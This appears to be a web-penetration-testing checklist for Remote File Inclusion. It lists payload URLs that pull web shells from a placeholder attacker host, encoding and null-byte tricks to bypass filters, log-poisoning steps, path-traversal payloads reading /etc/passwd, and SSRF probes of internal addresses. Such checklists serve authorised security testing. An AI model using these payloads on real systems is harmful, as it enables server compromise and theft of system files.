Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

  1. Initial Information Gathering

    • Identify and map all endpoints that accept file path or URL inputs.
    • Review source code (if available) to understand file handling mechanisms.
    • Check for endpoints where URLs or file paths are passed as parameters in URLs, headers, or body.

  2. Basic RFI Testing

    • http://Attacker.com/shell.txt
    • http://Attacker.com/shell.php
    • ftp://Attacker.com/shell.txt
    • ftp://Attacker.com/shell.php
    • Try including remote files hosted on different servers.

  3. URL Manipulation

    • Use different URL schemes (HTTP, HTTPS, FTP).
    • Use different file extensions (e.g., .txt, .php, .jpg).
    • Test bypass techniques for URL filters and restrictions:
      • Using URL encoding: http%3A%2F%2Fattacker.com%2Fshell.txt
      • Using double URL encoding: http%253A%252F%252Fattacker.com%252Fshell.txt
      • Using mixed case URL encoding: hTtP://aTtAcKeR.com/sHeLl.TxT

  4. Advanced URL Manipulation Techniques

    • Test for double encoding vulnerabilities.
    • Try bypassing filters with non-standard encodings and mixed encodings.
    • Use variations of URLs to bypass filters:
      • http://attacker.com/shell.txt%00.jpg
      • http://attacker.com/shell.txt?.jpg
      • http://attacker.com/shell.txt#.jpg

  5. File Upload and Inclusion

    • Check if file upload functionalities are present and try uploading files for inclusion.
    • Test inclusion of uploaded files to execute code (e.g., web shells).

  6. Log Poisoning and Inclusion

    • Inject payload into User-Agent, Referer, or other headers.
    • Include poisoned log files to execute injected payloads.

  7. Error Handling and Response Analysis

    • Analyze server responses for clues about the presence of RFI vulnerabilities.
    • Look for error messages that disclose file paths or other sensitive information.
    • Verify if application stack traces are exposed in responses.

  8. Local File Inclusion (LFI) Fallback Testing

    • If RFI is not possible, test for Local File Inclusion (LFI) vulnerabilities.
    • Test common LFI payloads to include local files:
      • ../../../../etc/passwd
      • ..%2F..%2F..%2F..%2Fetc%2Fpasswd
      • ../../../../../../../../../../../etc/passwd

  9. Server-Side Request Forgery (SSRF)

    • Test for SSRF vulnerabilities that can be exploited to achieve RFI.
    • Attempt to include internal resources via SSRF:
      • http://localhost:8080/
      • http://127.0.0.1/
      • http://internal-service/